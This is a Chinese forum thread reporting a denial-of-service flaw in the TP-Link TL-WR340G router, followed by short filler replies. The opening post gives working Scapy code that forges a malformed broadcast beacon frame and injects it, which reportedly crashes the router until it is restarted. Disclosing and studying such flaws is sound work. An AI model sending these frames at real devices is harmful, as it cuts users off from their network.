查看: 2237|回复: 25

TL-WR340G无线路由器拒绝服务漏洞

[复制链接]
发表于 2012-9-30 06:30:05 | 显示全部楼层 |阅读模式
TL-WR340G是TP-Link出品的一款轻量级无线路由器,近日有国外黑客发现了这款路由器上的一个拒绝服务漏洞,只要发送一个简单的畸形包到路由器,便可使路由器停止工作,需要手动重启路由器才能恢复正常,算是比较严重的了
漏洞细节:
型号:TL-WR340G无线路由器
固件版本: 4.7.11  Build 101102 Rel.60376n
硬件版本:WR340G v3
触发漏洞的过程非常简单,需要用到网络软件Scapy,构造包的详情如下:
1
fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP

2
MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()



接下来发送数据包:
1
sendp(fr,iface="injection capable wireless interface",count=5)



攻击成功之后,路由器将直接挂掉,具体表现就是不管已经连接还是未连接的客户端都无法连接互联网,除非手动登入管理界面软重启或者断电重启。
发表于 2012-10-2 19:04:11 | 显示全部楼层
不错,看看。  
发表于 2012-10-3 10:57:35 | 显示全部楼层
没有医保和寿险的,天黑后请不要见义勇为……  
发表于 2012-10-8 11:44:26 | 显示全部楼层
读10年语文,不如聊半年QQ  
发表于 2012-10-8 18:00:19 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-11-17 00:17:56 | 显示全部楼层
好人一生平安  
发表于 2014-12-4 11:49:59 | 显示全部楼层
嘿嘿  
发表于 2014-12-27 11:17:28 | 显示全部楼层
支持一下吧  
发表于 2015-1-27 12:32:33 | 显示全部楼层
孜孜不倦, 吾等楷模 …………  
发表于 2015-3-1 10:33:05 | 显示全部楼层
既然来了,就留个脚印  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则